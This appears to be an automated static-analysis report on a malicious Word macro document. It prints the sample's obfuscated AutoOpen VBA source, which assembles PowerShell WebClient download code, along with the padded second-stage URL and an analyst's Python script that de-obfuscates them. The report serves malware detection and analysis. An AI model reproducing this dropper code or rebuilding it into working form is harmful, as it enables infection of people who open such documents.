Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 865e660b5d65cfea…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 102.5 KB
Created: 2018-02-08 13:32:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 9c1cb76a3ab63abe4f45c20c0c90cdc9
SHA-1: 3e6c7c5111fb6d91ab1f7152d21a09e885e993f3
SHA-256: 865e660b5d65cfea1cf8d595c281363bd399c0a47b0270dac8bb9b8e7dd9fcf1
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word (OLE) document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. The procedure body is mostly arithmetic on undeclared variables, kept from raising errors by On Error Resume Next and serving only as padding; its one real action is Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn, which invokes a second procedure with the result of the LuQPFKHUKuJWn() function. That function assembles its payload from Mid() slices of junk-padded string literals; with the padding tokens (c3y+c3y, D4G+D4G, 65N+65N and the '+' concatenation operator) removed, the slices read as PowerShell fragments (a -creplace chain built from [CHAR] casts, System.Net.WebClient, foreach(...){try{), and the document body carries an https:// URL obfuscated with the same tokens, so the likely purpose is downloading a second-stage payload. The OLE_VBA_SHELL heuristic reports a Shell() call, i.e. the assembled command line is handed to the operating system; the call itself does not appear in the portion of macros.bas shown below. The ClamAV signature name Img.Dropper.PhishingLure-6443153-0 is consistent with a phishing-lure dropper.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell(), which passes a command line to the operating system for execution
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas below), so this marker is secondary to the OLE_VBA_* findings.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y (in document text, OLE body; the string carries the same c3y+c3y and D4G+D4G padding tokens as the macro's Mid() string literals)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard DrawingML schema namespace, not an attacker-controlled address)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24155 bytes
SHA-256: b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39  -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y  65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2  -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96  -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM 
... (truncated)
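The following is an added example for this report and is not the sample's own code or part of the analysis tool (oletools is not used). It does what an analyst does by hand with the preview above: evaluate each Mid() slice with VBA's 1-based indexing, then strip the padding tokens, so that the PowerShell fragments the macro assembles become readable. Its inputs are copied from the page (the eight Mid() lines of the macros.bas preview and the obfuscated URL from the OLE body). The set of tokens to strip (c3y+c3y, D4G+D4G, 65N+65N and the '+' string-concatenation operator) is inferred from those strings; the -replace chain that removes them at run time is not shown on the page, so the exact token set, and what the real script does with x20, lone D4G, AVT, Fit or e5t, is an assumption.

```python
"""Recover the Mid()-sliced, junk-padded strings of this sample's macro.

Analyst reconstruction (added example), not the sample's code and not
oletools. Inputs are copied from the report page; the token list is an
assumption drawn from the visible strings.
"""
import re

# Sample input: Mid() lines copied verbatim from the macros.bas preview.
MACRO_EXCERPT = r'''
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39  -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y  65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2  -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96  -c3Sqv"), 19, 31)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
'''

# Sample input: the obfuscated URL carved from the document body.
OBFUSCATED_URL = "https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y"

# Padding patterns observed in the strings above. Assumption: the run-time
# -replace chain removes exactly these; the page does not show that chain.
JUNK_TOKENS = ("'+'", "c3y+c3y", "D4G+D4G", "65N+65N")

MID_RE = re.compile(r'Mid\(\("([^"]*)"\),\s*(\d+),\s*(\d+)\)')
CHAR_RE = re.compile(r"\[CHAR\](\d{1,3})", re.IGNORECASE)


def vba_mid(s, start, length):
    """VBA Mid(): start is 1-based; a start past the end yields ""."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid needs start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def strip_junk(s, tokens=JUNK_TOKENS):
    """Delete junk tokens until nothing changes.

    The obfuscator nests tokens (the URL contains 'D4G+D4c3y+c3yG', one
    token split by another), so a single pass in the wrong order leaves a
    token behind. Iterating to a fixpoint removes the nested ones whatever
    order the tokens are tried in.
    """
    while True:
        before = s
        for t in tokens:
            s = s.replace(t, "")
        if s == before:
            return s


def char_casts(s):
    """List every [CHAR]n cast with the character it evaluates to."""
    return [(m.group(0), chr(int(m.group(1)))) for m in CHAR_RE.finditer(s)]


def mid_fragments(vba_text):
    """Evaluate each Mid(("literal"), start, len) found in the macro text."""
    return [vba_mid(s, int(a), int(n)) for s, a, n in MID_RE.findall(vba_text)]


def recover(vba_text):
    """Sliced fragments with the padding removed, in source order.

    Tokens cut by a slice boundary (the '65N+65' tail, the leading '+D4G')
    only disappear once the fragments are concatenated in run-time order,
    which needs the full macro; the page shows only part of it.
    """
    return [strip_junk(f) for f in mid_fragments(vba_text)]


if __name__ == "__main__":
    print("URL:", strip_junk(OBFUSCATED_URL))
    for i, frag in enumerate(recover(MACRO_EXCERPT)):
        print(f"[{i}] {frag!r}")
        for cast, ch in char_casts(frag):
            print(f"     {cast} -> {ch!r}")
```

Run stand-alone, the script prints the body URL with the padding removed (the trailing c3y is half a token cut at the extraction boundary, so confirm the host against the fully de-obfuscated script before acting on it) and fragments such as `System.Net.WebClient;x20NSB = x20nsada`, `ach(x20asfc in x20ADCX){try{x20YYD` and `-CrepLaCE D4Ge5tD4G,[ChAR]92`, with `[CHAR]36` resolving to `$`, `[CHAR]39` to `'`, `[CHAR]92` to `\` and `[ChAR]70+[ChAR]105+[ChAR]116` to the string `Fit`. Where PowerShell syntax expects `$` the fragments show `x20` (`foreach(x20asfc in x20ADCX)`), which suggests one more replace that is not visible on the page; the code deliberately leaves `x20` alone rather than guess it.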